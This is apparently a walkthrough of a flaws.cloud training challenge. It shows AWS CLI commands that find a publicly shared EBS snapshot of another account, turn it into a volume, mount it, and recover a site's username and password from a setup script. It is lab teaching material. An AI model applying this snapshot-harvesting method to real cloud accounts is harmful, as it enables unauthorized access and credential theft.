According to the description, there is an ec2 instance that is hosting a page that is present on the following link, they have mentioned that there was a snapshot of the ec2 instance:

4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

There was a snapshot of the ec2, we should check what IAM user is our flaws account linked to, use the following command:

aws --profile flaws sts get-caller-identity
#This command is often used to verify which AWS credentials are currently being used

We know that there is an account “backup” with account id 975426262029, that was taking snapshots of the EC2 instance:

aws --profile flaws  ec2 describe-snapshots --owner-id 975426262029

By default snapshots are private, and you can transfer them between accounts securely by specifying the account ID of the other account, but a number of people just make them public and forget about them it seems

As the snapshots can be shared, we will import this snapshot to our account:

aws --profile default ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-0b49342abd1bdcb89

We create an ubuntu instance and mount the volume onto that instance:

  1. You need to create the instance, in the same region as the volume
  2. Once the instance is created go to volumes and connect the snapshot to the instance
  3. While mounting remember the device name so that it is easy when you are going to mount it into your Ubuntu instance, I chose /dev/xvdbd
  4. Once you connect the volume, SSH into your instance and mount the volume as follows:
lsblk

The snapshot volume is available as /xvdbd1

sudo file -s /dev/xvdbd1
#this command is asking Linux to identify the type of file system or data present on the block device /dev/xvdbd1. It could return results like "ext4 filesystem," "swap," "data," etc., depending on the actual content

Use, to mount the snapshot to your instance:

sudo mount /dev/xvdbd1 /mnt

Once the volume is mounted, go to /mnt/ and explore for any secrets you can find, as we want to log in to the website that is present on http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/

As you can see there is a setupNginx.sh present in Ubuntu in home directory of the mounted snapshot.

We have:

username - flaws

password - nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

using these creds we can login to the website: